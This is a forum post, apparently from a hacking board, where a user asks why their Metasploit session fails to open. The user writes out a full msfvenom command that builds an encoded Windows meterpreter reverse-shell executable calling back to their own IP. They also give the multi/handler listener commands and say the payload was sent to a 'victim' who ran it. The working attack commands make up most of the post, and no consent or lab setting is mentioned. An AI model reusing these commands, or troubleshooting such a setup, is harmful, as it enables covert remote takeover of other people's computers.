Jump to content

METASPLOIT (SESSION DOES NOT START)


!_ync3

Recommended Posts

I created a reverse_tcp payload with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=100.xxx.xxx.103 LPORT=443 -f exe > /root/Desktop/Payload_reverse_tcp.exe

The LHOST I've used was my Internet IP.

The payload was succefuly created at my desktop.

I've than port fowarded my router to foward any conection threw the port 443 to my local IP. ex: 192.168.0.20

I've than started msconsole and stared the listner:

msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show option

set LHOST 192.168.0.20 (MY LOCAL IP)
set LPORT 443

exploit

The listner started correctly and waited for incomming conections.

I've than sended the payload to the victim. The victim opened the payload.

But the the listener did not start a session.

I've than used the command: nestat -antp to see if the port fowarding was working fine.

I could see that the victims Ip was trying to connect, but the session would not start.

Could anyone help me????

Link to comment
Share on other sites

  • 2 weeks later...
  • 4 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...